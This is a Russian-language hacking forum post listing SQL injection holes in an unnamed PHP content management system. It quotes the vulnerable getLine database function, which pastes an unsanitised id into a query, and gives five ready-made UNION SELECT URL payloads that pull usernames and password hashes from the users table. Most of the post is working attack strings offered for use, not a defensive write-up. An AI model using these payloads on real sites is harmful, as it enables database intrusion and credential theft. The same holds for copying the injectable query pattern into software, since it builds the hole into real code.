|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Дополнение к https://forum.antichat.ru/showpost.php?p=1991535&postcount=343
---------------------------------------
SQL injection(требования: mq=off,rq=on)
№1
file: modules/users.php
PHP код:
case 1:
....
$user = $db->getLine("SELECT * FROM users",$d);
if(!$user) header("location: $PHP_SELF?i=error");
....
file: includes/functions_db.php
PHP код:
function getLine($query,$id=FALSE)
{
if($id===FALSE)
$this->query($query);
else
$this->query($query." WHERE `id`='$id'");
if(is_resource($this->sqlr))
{
$line=mysql_fetch_assoc($this->sqlr);
$this->freeResult();
return $line;
}
return FALSE;
}
result:
Код:
/index.php?n=modules/users&a=1&d=-1'+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+where+id=1+--+
№2
file: modules/forum.php
PHP код:
case 1:
...
$forum_cat = $db->getLine("SELECT id, name FROM forum_cat",$d);
if(!$forum_cat) header("location: $PHP_SELF?i=error");
...
file: includes/functions_db.php
PHP код:
function getLine($query,$id=FALSE)
{
if($id===FALSE)
$this->query($query);
else
$this->query($query." WHERE `id`='$id'");
if(is_resource($this->sqlr))
{
$line=mysql_fetch_assoc($this->sqlr);
$this->freeResult();
return $line;
}
return FALSE;
}
result:
Код:
/index.php?n=modules/forum&a=1&d=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+
//инъекции с использованием бажной функции getLine
№3
/index.php?n=modules/forum&a=3&d=1&o=1&q=-1'+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+users+where+id=1+--+
№4
/index.php?n=modules/forum&a=5&d=1&o=1&q=1&p=0&k=-1'+union+select+1,concat_ws(0x3a,username,password )+from+users+where+id=1+--+
№5
/index.php?n=modules/pm&a=3&d=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+f rom+users+where+id=1+--+&s=r_date&t=DESC&p=1
... |